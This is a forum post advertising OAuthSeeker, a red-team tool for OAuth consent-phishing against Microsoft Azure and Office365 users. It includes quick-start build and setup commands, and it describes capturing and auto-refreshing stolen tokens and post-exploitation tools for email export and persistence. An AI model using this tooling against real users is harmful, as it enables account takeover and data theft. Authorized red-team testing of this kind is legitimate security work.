Welcome to our community

Be apart of something great, join today!

Register Log in

OAuthSeeker - Red Team OAuth Phishing Tool for Microsoft Azure & Office365

OAuthSeeker - Red Team OAuth Phishing Tool for Microsoft Azure & Office365

OAuthSeeker is a red team tool for performing phishing attacks using malicious OAuth applications to compromise user identities within Microsoft Azure and Office365.


🚀 Key Features
  • Azure App OAuth Phishing: Perform OAuth phishing attacks targeting Microsoft Azure and Office365 users to gain access to Microsoft Graph API and Microsoft Azure resources.
  • Admin Control Panel: Includes authentication and runs on localhost by default.
  • Token Refresher: Automatically refreshes captured refresh tokens to keep them alive.
  • Custom Skins: Reskin frontend components for different phishing campaigns.
  • LetsEncrypt Integration: Built-in HTTPS support with LetsEncrypt or custom/self-signed certificates.
  • Easy Deployment: Single Go binary with sane defaults for most operations.


⚙️ Quick Start Guide
Code: 
git clone https://github.com/praetorian-inc/oauthseeker.git
cd oauthseeker
go build -o oauthseeker ./cmd/oauthseeker/

# Obtain an Access Token for App Registration
export JWT=$(az account get-access-token --resource https://graph.microsoft.com | jq -r .accessToken)

# Register and Install a New Systemd Application
sudo oauthseeker setup --access_token $JWT --azure --redirect_url $URL --name $NAME

# Open the Administrative Interface
open http://127.0.0.1:8080/admin/


🔍 Admin Interface
View collected credentials, refresh tokens, and interact with Microsoft Graph API through the built-in GraphRunner interface (OneDrive, SharePoint, Teams, Outlook, etc.).


🎛️ Leveraging Compromised Access Tokens
OAuthSeeker captures JWT and refresh tokens. Tokens are refreshed automatically every 24 hours. Use other tools for post-exploitation:
  • GraphRunner: Post-exploitation toolkit for Microsoft 365 (search/export emails, enumerate permissions, persistence, etc.).
  • GraphSpy: Web interface for token management, device code phishing, and data extraction.
  • OAuthAzure: Exchange JWT for Azure impersonation tokens.
  • OAuthPillage: Dump user information for additional phishing campaigns.


📚 Documentation
Full setup, configuration, and OpSec guidance available in the repository.

 
Click to expand...
You must log in or register to reply here.
Community platform by XenForo® © 2010-2025 XenForo Ltd.
Back
Top Bottom